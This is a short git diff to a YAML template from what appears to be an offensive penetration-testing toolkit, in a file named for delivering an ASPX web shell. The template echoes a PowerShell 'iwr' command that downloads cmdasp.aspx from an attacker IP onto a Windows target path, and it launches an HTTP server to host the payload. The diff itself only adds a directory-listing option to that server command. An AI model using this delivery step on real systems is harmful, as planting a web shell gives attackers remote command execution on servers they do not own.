--- a/src/profi/templates/scripts/deliver-webshell-aspx.yaml
+++ b/src/profi/templates/scripts/deliver-webshell-aspx.yaml
@@ -11,4 +11,4 @@ content: |
     echo '                      -----PowerShell-----                      '; \
     echo 'Deliver only: iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/cmdasp.aspx -Outfile <%=$(esh variables/delivery_path_windows)%>\cmdasp.aspx'; \
     echo '================================================================'; \
-     python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+     python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound <%=$(esh variables/delivery_dir_listing)%>
